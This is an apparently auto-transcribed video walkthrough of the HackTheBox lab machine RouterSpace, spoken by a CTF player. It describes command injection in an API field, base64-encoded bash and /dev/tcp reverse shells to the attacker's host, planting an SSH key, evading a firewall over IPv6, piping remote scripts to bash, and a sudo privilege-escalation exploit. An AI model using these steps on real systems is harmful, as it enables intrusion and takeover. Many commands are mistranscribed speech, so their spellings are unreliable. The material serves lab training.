What's going on YouTube? This is Ipsec. I'm doing RouterSpace from HacktheBox, which is going to cover something I don't have a lot of experience in, and that is mobile applications. But hopefully it still helps you with something. It starts off with trying to do some light reversing of the APK file and finding out that we don't really know how to read much of the code of it. So we're going to go to the easier way and do some dynamic analysis by running the app in a emulator and then intercepting its calls with BurpSuite. There's a lot of trial and error that's spent to get this working. At first, I tried to do the Android SDK, not Genymotion. And the last time I did that was like back in 2016 for the Holiday Hack Challenge from Sans. And if you go to ipsec.rock/holidayhack2016, you can find my write-up there. Those instructions don't work anymore. It was a pain back then. It's still a pain, but Genymotion makes it easy. So with that being said, if you want to learn how to run an app in your VM, this video is for you. So let's hop in. As always, we start off with an nmap, so -sc for default scripts, as v enumerate versions, oa output all formats, put in the nmap directory and call it RouterSpace, then the IP address of 10.10.11.148. This can take some time to run, so I've already ran it. Looking at the results, we have just SSH and HTTP. And looking at the SSH, it looks like it's like a custom SSH server. We have SSH 2.0 RouterSpace packet filtering version 1, so I'm not exactly sure what that is about. And then on the HTTP server, we have a lot of weird things like suspicious activity detected request ID. I don't know what that is. It's part of the 404 request. And is there anything else? X powered by RouterSpace. It's a CDN. Not exactly sure what that is. I know it's a content delivery network, but nothing really to go off of yet, right? So let's just go take a look at the website. So going to 10.10.11.148, we have, looks like a web page. It says connect to your routers with RouterSpace. And if we click this get start now, it goes nowhere. Scrolling through the page, looking for like accounts, emails, things, but it's just a bunch of lorem ipsum. There's a download link on both places. So if we click download, we get a APK file. So that looks like all there is to this. If we go features, pricing, contact, nothing here. So let's take a look at the APK. So I'm going to move the APK. I think it's just, nope, probably a capital R. To here, and then there's one tool that most people use when doing APKs. Let's just make this directory APK so we stay a bit organized. It looks like when I ran my nmap scan, I didn't actually put it in the directory. So, or I ran 2 scans. I'm just gonna clean that up because I ran it with sudo. Oh, it let me delete it. Okay, so let's move on. We can do apktool -h to see options. And I want to say the option is D. I'm going to try just apktool D RouterSpace. And yeah, there we go. It is decoding it. And if we go into the directory, we have like the manifest file to see information out of here about the application. And honestly, I don't know much about Android apps and things like that. So the knowledge you get here probably isn't going to be super helpful. I'm kind of looking through this manifest directory. Nothing really there. We see what packages it has. The Smalley is a Java compiled bytecode. So when you do this reversing, it doesn't compile straight to like just straight Java code, like if it was a jar or something like that. We're going to look at a different one to get a bit different view of it. But generally, when I go into a directory, we have this. It's normally in the com directory you want to go to, then called by the app RouterSpace. And then we can see the Smalley code for this, or Smalley. I don't know how to pronounce it. We can like look at build config to see exactly what it looks like. Nothing there, but main application, that seems like where I'd want to start. So we can see here, it's using Facebook React. So this is probably just a React web app, a JavaScript thing, I want to say. but this isn't really helping me too much. The other thing I could do, if we go up a few directories, we can do like grep-r. I'm going to do RouterSpace and see what's here. It's going to be a lot of packages, right? So I'm going to try cheating a little bit because we don't know the domain name yet. But if I do routerspace.htb, we do have something in a RSA certificate matches. So let's take a look at that just to see what it is. So RSA, I'm going to guess this is a signing key for the app. We do have routerspace.htb, so this is a SSL cert. Let's see. How do I view this? The one thing that's throwing me off is normally like RSA certificates begin with like the -- begin RSA private or public key. This doesn't have it. We could like base64 encode it and potentially put it in, but I'm guessing this is a different format. I'm just going to do the thing you always do when you don't know and go to Google. I'm going to type like android cert.rsa view. And let's see. New to cryptography. That's using that. Key tool print cert file. Let's try it. Key tool -print cert -file, right? Yep. Put the file there, and here we have it. So this is one way we could get the host name by just viewing this SSL certificate. There's a lot of good things you can do when you just decompile the app, but actually, let's see. Is it bytecode viewer on this? Let's see if I can do it a different way. Viewer, I guess GitHub maybe. Is this it? Yes, this is it. Let's go to releases, just download this and show you. Whenever doing anything in like Android files, if you get stuck, the one thing I do in CTFs is always just try a different tool because it's oddly complex and every tool behaves slightly differently, right? So we can run this jar. Let's see. Bytecode viewer. Then once it's just drag and drop the APK. I wonder if I can do click and get a dialog box. I can do add, and we can do it this way. ipsec htb. Oh no. I'm going to close this real quick. Apparently enter tries to load the directory, so it's probably going to like try to pull every single thing, which not what I want. This is a big directory. So this RouterSpace APK and then this APK. And then it's going to take probably 30 to 60 seconds for it to stop processing. You can know it's processing because this bar up here, that the progress bar is at the top left, not the bottom right, but it's a Java tool. So, but now that it's done, we can click on the APK and we get a simple thing. We can go com RouterSpace and compare like these main activities. Actually, we did main application, right? And if we look, does this look any different? So this is the benefit of doing these things during a CTF. You get to play with these tools, see which one you like the most, see if it's different. If you have trouble, you can then ask other people about it and find the other ways about it. So when you accomplish, or not accomplish, well, you will accomplish the box, but when you come across this in the real world, you have some type of experience about it, right? So this is like invoke direct, new instance, like that. And invoke special. Is this the same? I can't tell. I'm trying to make it bigger for you. And it does two decompilers, I guess, FernFlow and bytecode decompiler. But this looks like it's near identical, right? It's still got these invoke words. But I want to say bytecode viewer is a bit more readable than just going to the Somali code. I'm sure if you go to blog posts, there's going to be people that know way more about this subject than me. But always try other things, right? The next thing we want to do, though, is just run this application. Now, I don't have an Android phone, so I can't just run this on my phone, and even if I did, probably wouldn't. The installing Android on Ubuntu, if you use like the general SDK, whatever it's called, it's a huge royal pain and has a lot of bugs. The easiest way is to use a tool called Genymotion, or at least I believe this is the easiest way. OXDF taught me a lot on this part because it is very, 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 very particular with how you do things on this. Like the SDK manager is just a pain to get Android running, especially in a VM. And then it's a pain to get the proxy working so you can use BurpSuite to intercept things, probably because like certificates or something like that. I don't know, or maybe something weird on the networking stack. Genymotion seems to be the easiest to get that working with, but it's still picky about what Android version you pick. So let's just download Genymotion. And this is free for personal use. So move downloads, Genymotion, and then we can just execute Genymotion after we make it executable. And this is going to install it. I'm going to install it into this directory because I don't plan on running it for a while. Well, running it after this video. So it's not in a good location. The one thing I didn't mention is I did an apt install VirtualBox to set up VirtualBox on this. And then another thing you will need, if you go in your settings of your VM, because you're going to do nested virtualization, you have to go to your processor and make sure it is checked, like this virtualized thing. If it's not, then I think VirtualBox won't work or it'll be extremely slow. So you have to enable that. And if you're not running a VM on your host, you have to go into your main BIOS and enable it there. And if your VMs just run slow on your host, check your BIOS and enable the virtualization option. But it's telling me I can run Genymotion from this directory, so let's do it. So go here, /Genymotion. And let's see, I am going to delete this. This is from testing the box, or testing it. Let's just create a new one. Let's do a Google Nexus 5, sounds good. Next. I hope I did Nexus. I think I did Pixel last time. I wonder if I'm going to have issues. Android version, I'll leave it at 4.4. This looks fine. Creating device. Okay, now we can click start to start this up. And we should get a Android device. So there we go. It is loading. And then once it's up, we need to make sure our APK can run on it, because this is running an ancient version, I believe, of Android, because we chose, like, I forget, what was it, 4.4 or maybe 8? Let's see, what version was it? So Google Nexus 4.4. And if I did a Pixel, Google Nexus, let's see. Let's just try dropping the app now that it's here. So, where is it? Where's File Manager? Let's see. Places, Home. We can go HTTP, RouterSpace, APK. And we have this. Drop it here. And we have an error. I'm going to guess this is too old. I don't know exactly where the log is. I guess we could look at it here and see what it is. Less. It had a space in it. Let's see. APK. ADB client unknown. Performing push install. Install failed old SDK. So our version is too old, I guess. So I'm just going to search for Pixel, and we can run a 8 version. Let's try just Google Pixel. This is 8.1. Oh, I don't want to do 9. Let's just leave it at 8.1 and keep going. And this is, I guess, the painful part of this box, even with Genymotion, is figuring out a good device. And sometimes I've been able to get like the APK on it, and then for some reason this version of the device doesn't want to send data to my proxy, which is doubly annoying, right? So there's 2 battles to win. The first one is getting a device up and running that accepts your APK. The second one is setting up all the networking so you can intercept the traffic and analyze it. So Android is booting up. And the one thing I did not do, if we can probably edit this one and look at it. I generally put networking on bridge mode. So it's just not natted because I just have weird issues on NAT every now and then. I generally like bridge mode. But since we're in bridged, we'll keep going with bridge and see what happens. We can drop RouterSpace here. File transfer in progress. And come on. It's better. It didn't immediately hang or fail, right? So I assume it is transferring. I don't want to, I guess, can we click? No. Oh, yeah, we can. So if we click up near the top and go to settings, this is where we can set the proxy. So go here, network, and then I think we just click and hold on this. Maybe click on Wi-Fi. Oh, I turned it off. Turn it back on. Then click and hold on Android Wi-Fi, modify network, advanced options. Then we want to set a proxy to manual. And actually, before I do this, let's go to none real quick. Cancel. I'm going to click on this. My IP address is 10.03.15, and my gateway is 10.032. The gateway is going to be my box. If I do IP-ADDR, let's see, grep 10.0. I don't see a 10.032 here. I'm going to guess it's going to work. My VirtualBox IP is 192.168.56.1, but I'm not exactly sure what's going on here. This is why I generally do natting. Not natting, bridge mode, because if I did bridged, I just do ETH0's IP, right? But I'm going to try 10.032 real quick and see if this works. So click again, hold on the Android Wi-Fi here. Modify. Advanced options. Manual. And then 10.032. And maybe you can use both. I actually don't know. But let's just save this. And then in BurpSuite, what we have to do is go to our proxy options and no longer listen on 127.0.0.1. We can listen on all interfaces. And now, if I go to the Intercept tab, and if this works, we will be able to, the home button's down here. But if this works, we will be able to intercept a request. So I'm going to go to google.com, and we do. We see it down here. So that is good. So the next thing to do would be click here back at home. I'm going to drag up and then go to RouterSpace. And we want to intercept and see what connection this makes. So we keep going. Still nothing. I click check status and we can see it make a request. And it's requesting routerspace.htb, the same place we saw in that SSL certificate. Or maybe the RSA certificate, I should say, I guess. But let's do v etc host. And now 10.10.11.146. 148, actually, is the IP I want to say. And then if I forward this request, we can see, hey, the router is working fine, right? So if we put this in repeater, let's just minimize this. We can see, what? Did the server not respond to us? unknown host, RouterSpace.htb. Copy. Send. There we go. Either I have a typo here, ROUTERSPACE, or there's some weird DNS caching, but we have it here. We could try putting not IP, so if I do ABC, it's echoing that back. If we do space1, we have that. If we put this without JSON, what happens? If I just do 0, right? It's still going to echo it, right? If I do A, now we get some type of error. It's doing a JSON parse message. Libread, I'm just seeing if there's anything that I see that stands out here. Don't really see anything. We can try like special characters. A semicolon does not get printed. How about an exclamation point? Dollar does. $host, and it doesn't. So this is definitely going into some type of parsing thing now, right? I don't think $host would give me anything, but it's not printing the dollar. It does print the dollar when there's nothing afterwards, but that will also terminate a character. Will a pound space? That does not, but semicolon also doesn't. So I'm going to do like a command afterwards, so like ID, and we have this running. If this didn't work, I would probably go back to my host, do a which ID, and give it the full path in case the path isn't being set correctly. But at this point, we have command injection. So we should do a reverse shell. The painful thing is, like, we have these quotes. So I'm just going to base64 encode it so we have less special characters. So echo, then we can do --c, --i, like that, 10, 10, 14, 8, 9001, 0 and 1 like that. I just want to make sure this looks fine on the clipboard. base64-w0, and we can copy this. I actually don't like that plus, so I'm going to eyeball it. Putting the space here gets rid of this plus. We're going to get rid of that next plus as well. And the main reason I want to get rid of the pluses is I was lazy and didn't test it. If I do echo this, it's not URL decoding this plus, so we don't have to get rid of it. But that is why I'm doing it, because if I did this and then it had this as a space and not a plus, then the base64 string would be breaking when I send it, right? So this is just being careful not to break that. We can do A, and now echo, paste to base64, base64-D. We can see everything looks good except... Okay, yeah, it's still just echoing. And then bash. So nc lvmp 9001, send it, it hangs. We don't get a response back. It hangs, so it looks like we are, but we aren't. So there may be some type of firewall going on here, or maybe this is running in a Docker or something like that. So the first thing I'm going to check is the ls.la on /. And, oh man, this printing is awful. I wonder if I copy and paste this. So if I echo like this, I wonder, is there a printf? There we go. Printf works. So, what was I looking for? I was looking for a /.dockerenv, right? And I don't see that. So I don't think I'm running in a virtual environment, at least on this machine. I guess it could be LXC or some other virtualization technology, but I don't think so at this point. We could run like a uname-a. Sometimes that helps tell us, but we're just running Ubuntu. So let's run who am I? We are Paul. LSLA on home Paul. And I want to copy this, so printf. I already put a quote there. And we have a SSH directory. We also have the user.txt. So /.ssh, copy, echo, printf. Nothing here, so we have to create a SSH key. I'm going to do SSH keygen-f paul. And then cat paul.pub. There we go. I'm going to base 64 it, -w0. So we put it all on one line. And now when I copy this, I can do a echo base 64-d and direct it to home paul authorized keys. And then sh-i paul at 10.10.11.148. Click yes. And we are disconnected. So that did not work. Let's do a cat home paul.sh authorized keys. And that is surprising. Let's do ls. Okay. Wonder what is wrong with this command. ls on this. Did I... Who am I? That works. Let's put it like this. Okay, we got code execution this way. Home paul SSH. It's returning. We just didn't create anything. So let's redo this and try pasting it in this way. Base 64-d. Home paul SSH authorized keys. So that's good. Now I wonder if I did not terminate the quote. Burp is being really weird how it shows me this. Or there we go. So yeah, that definitely looks right. I'm going to put this in a new window. And then we can just do it ls home paul SSH. It's got an authorized key file now. SSH-i with paul. And we are in. So the first thing I want to look at is SSH, because if you remember, we had that weird SSH banner, right? This SSH 2.0 RouterSpace packet filtering thing. I guess this is a hint that there was a firewall in hindsight. But if we do etc SSH, let's do SSH deconfig, and just see if they put the banner there, right? Filter. I don't see that at all. Are they running a custom SSH server actually? Let's see. Cat nmap routerspace.nmap grep SSH -i. So I'm going to look for this string. So grep-r, paste this in, and I am not finding it. Grep-r, everything is denied. So ps-ef, ef grep ssh, user sbin ssh startup. So this is looking like the standard SSH server. Let's see. Strings sshd grep. So that's actually compiled into the SSH server. What? So, huh. Let's see. Is this stat sshd stat sgdisk? Okay, well, when I went down this rabbit hole, it's not something I had expected, right? But we just found something that the author did, and instead of just editing the banner, I think, in the config, he edited it in the SSH server. So maybe this is a rabbit hole, maybe it's another thing that's on the box. But the reason why I'm thinking it's custom edited is this user sbin directory is managed generally by a package manager. If you wanted to put something, I think there's user local sbin, which is where like this binary should have gone, because that's not managed by the package manager. If I update SSH on the server, there's a chance this gets wiped, right? But we can tell that because package managers, they don't store the full time in a 32-bit timestamp. So the SSH server being modified and having this full timestamp likely means this was manually placed on the server and not by the package manager. Like if I do a stat grep on modify, and then we just, I hate that I don't have up, grep modify grep-v, and we hide everything like this, there's probably only going to be one file, and that is because it is the SSHD server. So that is interesting. But the easiest way to privesc, especially on relatively easy boxes, or like easy rated, I think this one is either easy or medium. I forget exactly what difficulty level this is, but to always run LinPEAS, the Linux Privilege Escalation Script Awesome Suite. I always like downloading it again because it does update from time to time. I think this is last updated May 11th, so yes. Where is releases? Let's get out of this master LinPEAS. Get out of tree. There we go. Go to releases, linpeas.sh, save it, and then we can make dir dub, and then cp, oh, I wonder, do I have curl 10.10.14.8 and clvnp? Let's just do 80 like this. I don't have the way to download this over web because of the firewall. So what we can do is go into, real quick, side tangent. Let's see, firewall's normally under etc, is it sysconfig or network? Find dot grep ipt cd iptables. There we go. We have rules files. So I don't know the default size of an iptables rules.v4 file, but if I did, we may be able to tell if it's modified. But we could also, nope, both rules v6 and v4 are similar. Let's see. It looks like IPv6 hasn't been modified, so maybe I can get off this box over IPv6. We could try that. Everyone knows how to SSH, right? We could always just try exfilling over IPv6 because this rule file looks untouched. 1655. I'm just saying if there's a telltale sign. 217. I don't know. But IPv6 sounds fun right now. So let's try this. Ton 0. I am this. Ping 6. I can ping myself. So nc lvnp 80. I am listening on IPv6, right? So curl, let's see, curl -6 http like this. Let's see, curl IPv6. Is there a flag? --interface -g-6. Curl see. It also put the IP in brackets. The last time I did this is probably my sneaky video, like in HacktheBox many years ago, right? So hopefully we get this working. Hey, IPv6 does get out. That's actually pretty cool. I want to go back real quick. Another tangent. Actually, we'll do it at the end of the video. But yeah, so IPv6 does get out of this box. We could do LinPEAS this way. So go back in my www, move, downloads LinPEAS here, and we can now do this curl, right? And then slash LinPEAS, well, let's do port 8000, and then slash linpeas.sh. Python 3-m http server. And the reason why IPs, I should have remembered this, but IPs need to be in brackets because IPv6 uses colons, not periods, which are also used for ports. So that's why you wrap an IP address and IPv6 in brackets. Pipe it over to bash. And it is refused. Let's see. Because this is not listing on IPv6. HTTP server. Let's see. Bind. What if I specify the address? If this supports IPv6? I don't think this one supports IPv6. So we could probably run netcat probably. LVNP 8000. Do we have NC here? We do. NC-6 like this. 8000. Let's see, NC-6 8000 bash. NC-6 dead beef. There we go. Pipe it to bash. And we'll send LinPEAS here. So listening on all ports, port 8000, and then sending it the contents of linpeas.sh. We're grabbing it here and sending that to bash. And here we go. We're going to run LinPEAS. I'm going to pause the video, let this script finish, and then we will go over it. So I'm not positive if this is still running or not, but I'm just going to Control-C it, and we can go near the top. So if I look at it, we can just go through everything. Let's see. Here we go. So the very first thing it says is this CVE 2021-3560. So let's Google exactly what this is. And this is a polkit. And I want to say this requires pkexec. Let's see. Which pkexec lsla on this file. And that is set UID. So this exploit may actually work. Actually, it requires GNOME Control Center, actually, I think. So maybe it doesn't. I want to say, I thought I remembered removing this a long time ago. Maybe it did not. I'm confusing the machines. Oh, wait. I ran that on my host machine. It's been a while since I updated my box, I guess, or maybe that was the latest date. But which pkexec? It helps if I run the commands on the machine that I'm intended to run, right? Not set UID anyways. So I think it requires GNOME Control Center and for it to be set UID there. CV 2021. So 3560 is PwnKit. Or polkit. And then we have PwnKit. This one's definitely pkexec. We have this samedit one. If we Google this, see, do we have a good repo? We could read this, see how complicated it is. Let's see. If we go this, it does give instructions. So you can check if your version of sudo is vulnerable by doing sudo edit -s capital Y. If it asks you for the password, it's most likely vulnerable. So that's nice to know. If we do this, it's getting a password. So we just need to make and exploit. So let's download this. I'm just going to copy and paste them in. So v exploit.c set paste. Okay. Then the next one is shellcode.c. And let's see. Rex. So this is going to, oh, it's commented out. So once I paste it, I'll explain. Shellcode.c, set paste. So how this is written is the comments are what the assembly is going to be. So set UID is moving 105 in RAX, then moving 1 in RDI, which is going to be the first argument, and then calling syscall. So I bet if we did, let's see, x86 syscall convention maybe. If I probably just did man syscall. Let's see, syscall table. Table's probably a better word. This is probably better, 64-bit. What is the syscall? Set UID. 105. Oh, it is 105. For some reason I thought I said 104. Maybe I did, but we can see, yep, REX, it's moving the syscall number into that and then executing it, right? GID 106. So you can see kind of how this works, right? Bin SH. So if we look at exec VE, it's 59, and then it's putting all the arguments you need. So that's how that piece of code works. The next thing we need to find where we were, it's on this one. We need the make file. The make file, and I didn't check if like we had compiling tools on this. Hopefully we do, unless we have to copy it on our machine. If I just do make, looks like we do. /exploit ID, we are root. So hope you guys enjoyed this video. Take care, and I will see you all next week. Oh wait, no. I said I was going to try to get a reverse shell over IPv6, didn't I? So let's try that. I haven't actually done this trick before. I don't think so. Maybe I have. So what we want to do is that echo. Let's see. Let's see. Bash. There we go. Dev TCP. Was this going to work? Can we just do this? Let's see. IP-ADDR. Let's do this. Like that. I'm going to put it in. I'm not going to put it in brackets. We're going to try it without, because in this syntax, port is by a slash. So that's why I'm not putting it in brackets. And I wonder if there's ls dev TCP ls/dev cd dev TCP. I was hoping there was an easy way to tell if there was a TCP 6. But we'll check in a minute. Echo this base 64-D bash nc lvnp 9001. Run it. It hangs. But we get a connection. So no, we're on the box. Who am I? Paul. So, yep, that does work. We could have done IPv6 and skipped that whole SSH thing. So, hope you guys enjoyed the video. Take care. I want to see you all next week.